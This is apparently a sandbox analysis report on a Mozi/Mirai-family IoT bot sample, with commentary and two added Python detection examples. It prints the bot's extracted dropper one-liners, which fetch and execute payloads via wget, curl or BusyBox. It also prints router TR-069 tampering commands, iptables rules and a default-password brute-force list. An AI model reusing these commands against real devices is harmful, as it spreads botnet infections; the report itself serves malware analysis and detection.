
Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name: bin.sh.elf
Analysis ID: 1650259
MD5: fe597b006a3b685aa0e6680b2f8193a8
SHA1: a9b07391bac6600d7cb21f26308039cf5b94fc5f
SHA256: a9b27492292904b108baf4ae4578b7354d4257094a513e3db48f35b3684cb0eb
Tags: elf, user-abuse_ch

Detection

Mirai (score 88, range 0 - 100)

Two caveats belong next to that label. First, the Yara hits are generic Mirai rules, while the sample's own strings (the GET /Mozi.* download requests, the "acsMozi" ConnectionRequestPassword written with cfgtool into /mnt/jffs2/hw_ctree.xml, and the iptables DROP rules for TCP 7547, 35000 and 50023) are the markers of the Mozi family, a Mirai-derived P2P botnet; "Mirai" is therefore a family-level label rather than a precise one. Second, no command-and-control activity was observed during the run: no DNS queries, no Suricata hits and no extracted configuration. The five TCP endpoints in the network section are three Canonical/Ubuntu archive addresses (91.189.91.42, 91.189.91.43 and 109.202.202.202, the last serving ch.archive.ubuntu.com) and two AWS addresses that recur across unrelated submissions, which is consistent with the analysis VM's own background traffic rather than with infrastructure belonging to this sample.

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Analysis Details

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1650259
Start date and time: 2025-03-27 15:38:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: bin.sh.elf
Detection: MAL
Classification: mal88.troj.linELF@0/0@0/0
Command: /tmp/bin.sh.elf
PID: 6207
Exit Code: 135
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Process Tree

  • system is lnxubuntu20
  • bin.sh.elf (PID: 6207, Parent: 6125, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/bin.sh.elf
  • dash New Fork (PID: 6292, Parent: 4331)
  • rm (PID: 6292, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
  • dash New Fork (PID: 6293, Parent: 4331)
  • rm (PID: 6293, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
  • cleanup

Three details in this tree matter when reading the rest of the report. The MD5 recorded for PID 6207 (5ebfcae4fe2471fcc5695c2394773ff1) is not the sample's MD5 (fe597b006a3b685aa0e6680b2f8193a8): the process memory strings in the System Summary show the sample was started through /usr/bin/qemu-arm (binfmt_misc user-mode emulation), so that hash belongs to the emulator image and the dynamic behaviour is that of an emulated run. The exit code 135 is, if it follows the usual shell convention, 128+7, i.e. termination by SIGBUS; together with the absence of any outbound connection attributable to the sample this suggests the bot died before reaching its main loop. Finally, the two rm processes are children of dash PID 4331 rather than of the sample and delete mktemp-style files, so the "Executes the rm command" signature should be read with that parentage in mind.
Malware family: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums", many variants of the Mirai family have appeared, infecting mostly home networks all around the world.
Attribution: none
Reference: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Yara matches on the sample file (bin.sh.elf):

  • JoeSecurity_Mirai_9: Yara detected Mirai (Joe Security)
  • JoeSecurity_Mirai_5: Yara detected Mirai (Joe Security)
  • JoeSecurity_Mirai_8: Yara detected Mirai (Joe Security)
  • Linux_Trojan_Mirai_5c62e6b2 (author unknown), string $a at 0x3850e: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
  • Linux_Trojan_Mirai_77137320 (author unknown), string $a at 0x384f5: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
  • 1 further match not expanded in the source

Yara matches in process memory (6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp):

  • JoeSecurity_Mirai_9, JoeSecurity_Mirai_5, JoeSecurity_Mirai_8: Yara detected Mirai (Joe Security)
  • Linux_Trojan_Mirai_5c62e6b2 (author unknown), string $a at 0x3850e: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
  • Linux_Trojan_Mirai_77137320 (author unknown), string $a at 0x384f5: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
  • 2 further matches not expanded in the source

No Suricata rule has matched

              AV Detection

Source: bin.sh.elf | Avira: detected
Source: bin.sh.elf | Virustotal: Detection: 59%
Source: bin.sh.elf | ReversingLabs: Detection: 55%
Source: bin.sh.elf | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: bin.sh.elf | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: bin.sh.elf | String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: unknown | TCP traffic detected without corresponding DNS query: 54.171.230.55 (×1), 91.189.91.42 (×3), 91.189.91.43 (×2), 109.202.202.202 (×2), 34.249.145.219 (×4)
Source: bin.sh.elf | String found in binary or memory: http://%s:%d/bin.sh
Source: bin.sh.elf | String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: bin.sh.elf | String found in binary or memory: http://127.0.0.1
Source: bin.sh.elf | String found in binary or memory: http://127.0.0.1sendcmd
Source: bin.sh.elf | String found in binary or memory: http://HTTP/1.1
Source: bin.sh.elf | String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: bin.sh.elf | String found in binary or memory: http://ipinfo.io/ip
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 39242; 43928 -> 443; 33608 -> 443; 39242 -> 443; 42836 -> 443
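The dropper strings quoted above follow a fixed recipe: probe for a writable directory by creating a marker file and changing into the directory only if the write succeeded, fetch the stage with wget and fall back to curl and then BusyBox wget, and, if chmod 777 fails, copy /bin/ls and overwrite its contents so the new file inherits the execute bit. The following Python is an added example, not code from the sample or from Joe Sandbox: it encodes those traits as regular expressions written from the report's strings, adds the iptables DROP rules and the cfgtool CWMP edit quoted in the System Summary, and runs them over constructed command lines. The host 203.0.113.10 in the constructed input is an RFC 5737 documentation address, not an address from this sample.

```python
"""Indicator matching for Mirai/Mozi-style dropper shell strings (added example, not Joe Sandbox code)."""
import re
from typing import Dict, List, Tuple

# Each indicator is one regular expression over a single shell command string.
# The patterns are written from the strings quoted in this report.
INDICATORS: Dict[str, re.Pattern] = {
    # '>/var/run/.x&&cd /var/run': create a marker file and cd into the directory
    # only if that write succeeded (the back-reference ties both paths together)
    "writable_dir_probe": re.compile(r">\s*(/[\w./-]+)/\.\w+\s*&&\s*cd\s+\1"),
    # 'wget http://... ||curl -O http://... ||/bin/busybox wget http://...'
    "download_fallback_chain": re.compile(
        r"(?:wget|curl\s+-O|/bin/busybox\s+wget)\s+http://\S+\s*\|\|\s*"
        r"(?:wget|curl\s+-O|/bin/busybox\s+wget)\s+http://"
    ),
    # 'chmod 777 i ||(cp /bin/ls ii; cat i>ii ...)': when chmod fails, clone a file
    # that is already executable and overwrite its contents to keep the exec bit
    "exec_bit_copy_trick": re.compile(r"chmod\s+777\s+\S+\s*\|\|\s*\(\s*cp\s+/bin/ls\s+\S+"),
    # iptables DROP rules on TCP 7547 (TR-069/CWMP), 35000 and 50023, as in the sample
    "tr069_port_block": re.compile(
        r"iptables\s+-I\s+(?:INPUT|OUTPUT)\s+-p\s+tcp\s+"
        r"--(?:dport|sport|destination-port|source-port)\s+(?:7547|35000|50023)\s+-j\s+DROP"
    ),
    # 'cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ...'
    "cwmp_acs_tamper": re.compile(r"cfgtool\s+set\s+\S+\s+InternetGatewayDevice\.ManagementServer\b"),
}


def classify_command(cmd: str) -> List[str]:
    """Return the names of every indicator that fires on one command string."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def scan_lines(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Run classify_command over command lines (shell history, auditd execve
    arguments, honeypot session logs) and return (index, indicators) per hit."""
    hits: List[Tuple[int, List[str]]] = []
    for idx, line in enumerate(lines):
        tags = classify_command(line)
        if tags:
            hits.append((idx, tags))
    return hits


# Constructed sample input. Line 0 is the report's dropper string with the %s:%d
# placeholders filled with a documentation address (RFC 5737), not a real C2.
SAMPLE_LINES: List[str] = [
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/tmp/.x&&cd /tmp;rm -rf i;"
    "wget http://203.0.113.10:80/i ||curl -O http://203.0.113.10:80/i ||"
    "/bin/busybox wget http://203.0.113.10:80/i;chmod 777 i ||"
    "(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i",
    "wget https://example.com/release.tar.gz && tar xzf release.tar.gz",
    "iptables -I INPUT -p tcp --destination-port 7547 -j DROP",
    "iptables -I INPUT -p tcp --dport 22 -j ACCEPT",
    'cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"',
    "cd /tmp && ./configure && make",
]

if __name__ == "__main__":
    for idx, tags in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: {', '.join(tags)}")
```

The writable-directory probe is the most reliable of the five traits: the `>/dir/.x&&cd /dir` pairing with a matching back-reference almost never occurs in legitimate shell usage, whereas a bare `wget || curl` fallback or a `chmod 777` does. Score on combinations, not on single hits.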

              System Summary

Source: bin.sh.elf, type: SAMPLE | Matched rules: Linux_Trojan_Mirai_5c62e6b2, Linux_Trojan_Mirai_77137320, Linux_Trojan_Mirai_ac253e4f (author: unknown)
Source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORY | Matched rules: Linux_Trojan_Mirai_5c62e6b2, Linux_Trojan_Mirai_77137320, Linux_Trojan_Mirai_ac253e4f (author: unknown)
Strings containing 'busybox' (source: initial sample):

  • busybox
  • ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
  • /bin/busybox cat /bin/ls|head -n 1
  • /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
  • /bin/busybox cat /bin/ls|more
  • "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
  • dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
  • /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
  • /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
  • /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
  • /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
  • ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
  • >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
  • >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
  • >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
  • /bin/busybox wget;/bin/busybox echo -ne '%s'
  • ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
  • me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
  • nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
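Several of the BusyBox strings above read exactly 52 bytes of /bin/ls (dd bs=52 count=1, hexdump -n 52, cat | head -n 1). 52 bytes is the size of a 32-bit ELF header, and three fields inside it, EI_CLASS (byte 4), EI_DATA (byte 5) and e_machine (bytes 18-19), tell the loader which architecture the victim runs so that it can request the matching payload. The following Python is an added example, not code from the sample or from Joe Sandbox: it decodes those fields the way such a loader would, and builds constructed headers to exercise the decoder. The e_machine numbers follow the ELF specification; the report does not say which Mozi.* suffix belongs to which architecture, so no such mapping is made here.

```python
"""Architecture fingerprinting from the first 52 bytes of an ELF file (added example)."""
import struct
from typing import Dict, Union

ELF_MAGIC = b"\x7fELF"
ELF32_HEADER_SIZE = 52        # what the sample's dd/hexdump/head commands read
E_MACHINE_OFFSET = 18         # same offset in ELF32 and ELF64 headers

# e_machine values from the ELF specification and its processor supplements;
# enough to cover the usual IoT botnet build targets.
E_MACHINE_NAMES: Dict[int, str] = {
    2: "sparc", 3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm",
    42: "sh", 62: "x86_64", 183: "aarch64", 243: "riscv",
}


def is_elf(header: bytes) -> bool:
    """True if the buffer starts with the ELF magic and is long enough to hold e_machine."""
    return len(header) >= E_MACHINE_OFFSET + 2 and header[:4] == ELF_MAGIC


def elf_fingerprint(header: bytes) -> Dict[str, Union[int, str]]:
    """Decode class, byte order and machine from an ELF header prefix.

    Raises ValueError for non-ELF input or malformed e_ident bytes."""
    if not is_elf(header):
        raise ValueError("not an ELF header")
    ei_class, ei_data = header[4], header[5]          # 1=32-bit/2=64-bit, 1=LE/2=BE
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS or EI_DATA")
    fmt = "<H" if ei_data == 1 else ">H"              # e_machine uses the file's own byte order
    (e_machine,) = struct.unpack_from(fmt, header, E_MACHINE_OFFSET)
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "e_machine": e_machine,
        "arch": E_MACHINE_NAMES.get(e_machine, "unknown"),
    }


def make_elf_header(bits: int, little_endian: bool, e_machine: int) -> bytes:
    """Build a constructed 52-byte ELF header prefix for testing (not a real binary)."""
    e_ident = ELF_MAGIC + bytes([
        1 if bits == 32 else 2,     # EI_CLASS
        1 if little_endian else 2,  # EI_DATA
        1,                          # EI_VERSION
    ]) + bytes(9)                   # EI_OSABI, EI_ABIVERSION, padding
    fmt = "<HHI" if little_endian else ">HHI"
    header = e_ident + struct.pack(fmt, 2, e_machine, 1)   # e_type=ET_EXEC, e_machine, e_version
    return header.ljust(ELF32_HEADER_SIZE, b"\x00")


if __name__ == "__main__":
    # Read the same 52 bytes the sample reads from /bin/ls, if the file exists.
    try:
        with open("/bin/ls", "rb") as f:
            print("/bin/ls:", elf_fingerprint(f.read(ELF32_HEADER_SIZE)))
    except (OSError, ValueError) as exc:
        print("could not fingerprint /bin/ls:", exc)
    print("constructed ARM header:", elf_fingerprint(make_elf_header(32, True, 40)))
```

The `while read i; do echo $i; done < /bin/ls` variants in the strings exist for shells where neither dd nor hexdump is available; they dump the same leading bytes, and the bot parses them on its own side, which is why a telnet honeypot that answers with a plausible fake ELF header of the desired architecture can steer which payload the loader sends.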
Potential weak passwords found (source: initial sample): admin, default, support, service, supervisor, guest, administrator, 123456, 54321, password, 12345, admin1234

Potential command strings found (source: initial sample): GET /c HTTP/1.0; GET %s HTTP/1.1; GET /c; GET /Mozi.6 HTTP/1.0; GET /Mozi.7 HTTP/1.0; GET /Mozi.c HTTP/1.0; GET /Mozi.m HTTP/1.0; GET /Mozi.x HTTP/1.0; GET /Mozi.a HTTP/1.0; GET /Mozi.s HTTP/1.0; GET /Mozi.r HTTP/1.0; GET /Mozi.b HTTP/1.0; GET /Mozi.4 HTTP/1.0; GET /Mozi.k HTTP/1.0; GET /Mozi.l HTTP/1.0
Rule metadata for the three Elastic-licensed rules; each matched both the sample file (type: SAMPLE) and the memory region 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp (type: MEMORY):

  • Linux_Trojan_Mirai_5c62e6b2: reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
  • Linux_Trojan_Mirai_77137320: reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
  • Linux_Trojan_Mirai_ac253e4f: reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: classification engine | Classification label: mal88.troj.linELF@0/0@0/0
Source: /usr/bin/dash (PID: 6292) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
Source: /usr/bin/dash (PID: 6293) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
Source: /tmp/bin.sh.elf (PID: 6207) | Queries kernel information via 'uname'
Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/arm
Source: bin.sh.elf, 6207.1.00007fffacbc0000.00007fffacbe1000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf
Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmp | Binary or memory string: Urg.qemu.gdb.arm.sys.regs">
Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm
Source: bin.sh.elf, 6207.1.00007fffacbc0000.00007fffacbe1000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm
Source: bin.sh.elf, 6207.1.000055ae61bb0000.000055ae61cbc000.rw-.sdmp | Binary or memory string: rg.qemu.gdb.arm.sys.regs">

              Stealing of Sensitive Information

Source: Yara match | File source: bin.sh.elf, type: SAMPLE
Source: Yara match | File source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: bin.sh.elf PID: 6207, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: bin.sh.elf, type: SAMPLE
Source: Yara match | File source: 6207.1.00007fd1f8017000.00007fd1f8058000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: bin.sh.elf PID: 6207, type: MEMORYSTR
MITRE ATT&CK matrix. Techniques with signature hits (number of hits in parentheses):

  • Resource Development: Scripting (1)
  • Execution: Command and Scripting Interpreter (1)
  • Persistence: Scripting (1)
  • Defense Evasion: File Deletion (1)
  • Credential Access: Brute Force (1)
  • Discovery: Security Software Discovery (11)
  • Command and Control: Encrypted Channel (1), Application Layer Protocol (1)

Matrix cells without hits (template placeholders): Reconnaissance: Gather Victim Identity Information, Credentials; Resource Development: Domains; Initial Access: Valid Accounts, Default Accounts; Execution: Scheduled Task/Job; Persistence: Boot or Logon Initialization Scripts; Privilege Escalation: Path Interception, Boot or Logon Initialization Scripts; Defense Evasion: Rootkit; Credential Access: LSASS Memory; Discovery: Application Window Discovery; Lateral Movement: Remote Services, Remote Desktop Protocol; Collection: Data from Local System, Data from Removable Media; Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth; Impact: Abuse Accessibility Features, Network Denial of Service.
              No configs have been found
Behavior graph (ID 1650259, sample bin.sh.elf, start date 27/03/2025, architecture LINUX, score 88): network nodes 109.202.202.202:80 (INIT7CH, Switzerland), 91.189.91.42:443 (CANONICAL-ASGB, United Kingdom) and 3 other IPs or domains; graph-level signatures: Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, Multi AV Scanner detection for submitted file, Yara detected Mirai; processes started: dash → rm (twice) and bin.sh.elf.
Antivirus results for the submitted file (bin.sh.elf):

  • Virustotal: 60%
  • ReversingLabs: 56%, Linux.Trojan.Mirai
  • Avira: 100%, EXP/ELF.Mirai.O

No antivirus matches in the remaining scan tables.


              No contacted domains info
URLs found in the sample (source: bin.sh.elf; none flagged malicious; reputation: high):

  • http://%s:%d/bin.sh;chmod
  • http://HTTP/1.1
  • http://ipinfo.io/ip
  • http://127.0.0.1
  • http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
  • http://%s:%d/bin.sh
  • http://127.0.0.1sendcmd

The %s:%d entries are printf format templates filled in at runtime with the loader's host and port, so they are not usable as network indicators on their own; http://HTTP/1.1 and http://127.0.0.1sendcmd appear to be adjacent strings run together by the extractor.
Contacted IPs (none flagged malicious):

  • 54.171.230.55, United States, ASN 16509 AMAZON-02
  • 34.249.145.219, United States, ASN 16509 AMAZON-02
  • 109.202.202.202, Switzerland, ASN 13030 INIT7CH
  • 91.189.91.43, United Kingdom, ASN 41231 CANONICAL-ASGB
  • 91.189.91.42, United Kingdom, ASN 41231 CANONICAL-ASGB
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            54.171.230.55na.elfGet hashmaliciousPrometeiBrowse
                              SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elfGet hashmaliciousUnknownBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    x86_64.elfGet hashmaliciousUnknownBrowse
                                      arm.elfGet hashmaliciousUnknownBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          efefa7.elfGet hashmaliciousMiraiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                34.249.145.219na.elfGet hashmaliciousPrometeiBrowse
                                                  boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                                    91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                        SecuriteInfo.com.FileRepMalware.29874.30583.elfGet hashmaliciousUnknownBrowse
                                                                          SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                        91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                            SecuriteInfo.com.FileRepMalware.29874.30583.elfGet hashmaliciousUnknownBrowse
                                                                                              SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                                                boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CANONICAL-AS (GB) | na.elf | malicious | Prometei | 91.189.91.42
CANONICAL-AS (GB) | na.elf | malicious | Prometei | 91.189.91.42
